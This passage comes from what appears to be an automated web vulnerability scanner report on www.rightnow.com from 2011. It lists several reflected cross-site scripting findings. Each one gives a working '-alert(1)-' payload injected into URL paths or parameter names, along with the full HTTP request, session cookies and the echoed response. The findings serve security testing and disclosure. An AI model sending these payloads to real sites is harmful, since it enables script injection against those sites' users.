Date: Wed, 31 Aug 2011 18:16:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38705

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
tp://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/helvetica-light-webfont.woffe759a'-alert(1)-'5ea9d5a4cb7',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.ge
...[SNIP]...

4.235. http://www.rightnow.com/helvetica-webfont.ttf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/helvetica-webfont.ttf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a72b2'-alert(1)-'fc5f88b9e75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /helvetica-webfont.ttfa72b2'-alert(1)-'fc5f88b9e75 HTTP/1.1
Host: www.rightnow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://investor.rightnow.com/includes/rightnow.main.css
Origin: http://investor.rightnow.com

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 19:48:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38619

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
get('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/helvetica-webfont.ttfa72b2'-alert(1)-'fc5f88b9e75',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.ge
...[SNIP]...

4.236. http://www.rightnow.com/helvetica-webfont.woff [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/helvetica-webfont.woff

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ccba'-alert(1)-'19306ec160d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /helvetica-webfont.woff7ccba'-alert(1)-'19306ec160d HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/cx.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:15:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38699

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
et('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/helvetica-webfont.woff7ccba'-alert(1)-'19306ec160d',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.ge
...[SNIP]...

4.237. http://www.rightnow.com/helvetica_bold-webfont.woff [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/helvetica_bold-webfont.woff

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 215d1'-alert(1)-'360df0dd7fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /helvetica_bold-webfont.woff215d1'-alert(1)-'360df0dd7fc HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/cx.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:15:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38704

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
ttp://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/helvetica_bold-webfont.woff215d1'-alert(1)-'360df0dd7fc',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.ge
...[SNIP]...

4.238. http://www.rightnow.com/helvetica_light-normal-webfont.woff [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/helvetica_light-normal-webfont.woff

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e75a1'-alert(1)-'1dafc8057a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /helvetica_light-normal-webfont.woffe75a1'-alert(1)-'1dafc8057a0 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/company-contact.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:15:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38712

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
w.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/helvetica_light-normal-webfont.woffe75a1'-alert(1)-'1dafc8057a0',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.ge
...[SNIP]...

4.239. http://www.rightnow.com/javascript/floatbox/floatbox.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript/floatbox/floatbox.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 811b9'-alert(1)-'6a55d50ed35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript811b9'-alert(1)-'6a55d50ed35/floatbox/floatbox.css HTTP/1.1
Host: www.rightnow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/javascript/s_code.js25e2d%27-alert(1)-%27cd0cf84d869?_=1314814583383
Cookie: s_vi=[CS]v1|272F47EA8501068E-6000010AE03739B6[CE]; PHPSESSID=5acd71n9cl008n5ut73i1l9fs0; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 19:49:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38630

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
jQuery.get('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript811b9'-alert(1)-'6a55d50ed35/floatbox/floatbox.css',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: fals
...[SNIP]...

4.240. http://www.rightnow.com/javascript/floatbox/floatbox.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript/floatbox/floatbox.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36081'-alert(1)-'cf2eb8cd43c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript/floatbox36081'-alert(1)-'cf2eb8cd43c/floatbox.css HTTP/1.1
Host: www.rightnow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/javascript/s_code.js25e2d%27-alert(1)-%27cd0cf84d869?_=1314814583383
Cookie: s_vi=[CS]v1|272F47EA8501068E-6000010AE03739B6[CE]; PHPSESSID=5acd71n9cl008n5ut73i1l9fs0; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 19:49:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38630

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
y.get('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript/floatbox36081'-alert(1)-'cf2eb8cd43c/floatbox.css',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});

...[SNIP]...

4.241. http://www.rightnow.com/javascript/floatbox/floatbox.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript/floatbox/floatbox.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37356'-alert(1)-'f2a926604f0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript/floatbox/floatbox.css37356'-alert(1)-'f2a926604f0 HTTP/1.1
Host: www.rightnow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/javascript/s_code.js25e2d%27-alert(1)-%27cd0cf84d869?_=1314814583383
Cookie: s_vi=[CS]v1|272F47EA8501068E-6000010AE03739B6[CE]; PHPSESSID=5acd71n9cl008n5ut73i1l9fs0; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 19:49:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38630

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
/www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript/floatbox/floatbox.css37356'-alert(1)-'f2a926604f0',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.ge
...[SNIP]...

4.242. http://www.rightnow.com/javascript/floatbox/floatbox.css [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript/floatbox/floatbox.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9ba9'-alert(1)-'a3061f6490a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript/floatbox/floatbox.css?c9ba9'-alert(1)-'a3061f6490a=1 HTTP/1.1
Host: www.rightnow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/javascript/s_code.js25e2d%27-alert(1)-%27cd0cf84d869?_=1314814583383
Cookie: s_vi=[CS]v1|272F47EA8501068E-6000010AE03739B6[CE]; PHPSESSID=5acd71n9cl008n5ut73i1l9fs0; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 19:49:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38633

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript/floatbox/floatbox.css?c9ba9'-alert(1)-'a3061f6490a=1',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.
...[SNIP]...

4.243. http://www.rightnow.com/javascript/floatbox/floatbox.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript/floatbox/floatbox.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44b27'-alert(1)-'d42ec4174bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript44b27'-alert(1)-'d42ec4174bb/floatbox/floatbox.js HTTP/1.1
Host: www.rightnow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/javascript/s_code.js25e2d%27-alert(1)-%27cd0cf84d869?_=1314814583383
Cookie: s_vi=[CS]v1|272F47EA8501068E-6000010AE03739B6[CE]; PHPSESSID=5acd71n9cl008n5ut73i1l9fs0; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 19:49:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38629

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
jQuery.get('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript44b27'-alert(1)-'d42ec4174bb/floatbox/floatbox.js',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false
...[SNIP]...

4.244. http://www.rightnow.com/javascript/floatbox/floatbox.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript/floatbox/floatbox.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e26f2'-alert(1)-'ac9e6d2d317 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript/floatboxe26f2'-alert(1)-'ac9e6d2d317/floatbox.js HTTP/1.1
Host: www.rightnow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/javascript/s_code.js25e2d%27-alert(1)-%27cd0cf84d869?_=1314814583383
Cookie: s_vi=[CS]v1|272F47EA8501068E-6000010AE03739B6[CE]; PHPSESSID=5acd71n9cl008n5ut73i1l9fs0; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 19:49:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38629

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
y.get('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript/floatboxe26f2'-alert(1)-'ac9e6d2d317/floatbox.js',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});

...[SNIP]...

4.245. http://www.rightnow.com/javascript/floatbox/floatbox.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript/floatbox/floatbox.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload add9f'-alert(1)-'184d0a8c26f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript/floatbox/floatbox.jsadd9f'-alert(1)-'184d0a8c26f HTTP/1.1
Host: www.rightnow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/javascript/s_code.js25e2d%27-alert(1)-%27cd0cf84d869?_=1314814583383
Cookie: s_vi=[CS]v1|272F47EA8501068E-6000010AE03739B6[CE]; PHPSESSID=5acd71n9cl008n5ut73i1l9fs0; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 19:49:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38629

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
//www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript/floatbox/floatbox.jsadd9f'-alert(1)-'184d0a8c26f',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.ge
...[SNIP]...

4.246. http://www.rightnow.com/javascript/floatbox/floatbox.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript/floatbox/floatbox.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a00e9'-alert(1)-'1e361830eef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript/floatbox/floatbox.js?a00e9'-alert(1)-'1e361830eef=1 HTTP/1.1
Host: www.rightnow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/javascript/s_code.js25e2d%27-alert(1)-%27cd0cf84d869?_=1314814583383
Cookie: s_vi=[CS]v1|272F47EA8501068E-6000010AE03739B6[CE]; PHPSESSID=5acd71n9cl008n5ut73i1l9fs0; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 19:49:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38632

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
/www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript/floatbox/floatbox.js?a00e9'-alert(1)-'1e361830eef=1',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.
...[SNIP]...

4.247. http://www.rightnow.com/javascript/floatbox/options.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript/floatbox/options.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7146'-alert(1)-'b47c019bbba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascriptc7146'-alert(1)-'b47c019bbba/floatbox/options.js HTTP/1.1
Host: www.rightnow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/javascript/s_code.js25e2d%27-alert(1)-%27cd0cf84d869?_=1314814583383
Cookie: s_vi=[CS]v1|272F47EA8501068E-6000010AE03739B6[CE]; PHPSESSID=5acd71n9cl008n5ut73i1l9fs0; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 19:49:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38628

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
jQuery.get('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
